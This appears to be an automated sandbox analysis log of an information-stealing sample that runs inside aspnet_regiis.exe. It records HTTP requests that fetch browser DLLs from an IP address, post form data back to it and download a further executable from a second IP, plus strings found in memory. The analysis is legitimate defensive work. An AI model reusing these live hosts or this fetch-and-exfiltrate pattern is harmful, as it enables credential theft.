Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 3_2_02A05237 GetProcessHeap,RtlAllocateHeap,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

3_2_02A05237

Source: global traffic	HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ldms/a43486128347.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache

Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)

Source: global traffic

DNS traffic detected: DNS query: steamcommunity.com

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHIJDHCAKKFCBGCBAAECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 256Connection: Keep-AliveCache-Control: no-cache

Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/ldms/a43486128347.exe
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/ldms/a43486128347.exe1kkkk
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/ldms/a43486128347.exeJ5
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/ldms/a43486128347.exetion:
Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: file.exe, 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp, aspnet_regiis.exe, 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
Source: file.exe	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, file.exe	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: file.exe	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1857214387.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1857214387.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: file.exe	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: file.exe	String found in binary or memory: http://ocsp.comodoca.com0
Source: aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1857214387.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: file.exe	String found in binary or memory: http://ocsp.sectigo.com0
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Amcache.hve.3.dr	String found in binary or memory: http://upx.sf.net
Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: aspnet_regiis.exe, aspnet_regiis.exe, 00000003.00000002.2680382031.000000006CADD000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: aspnet_regiis.exe, 00000003.00000002.2662565963.0000000021DBD000.00000002.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
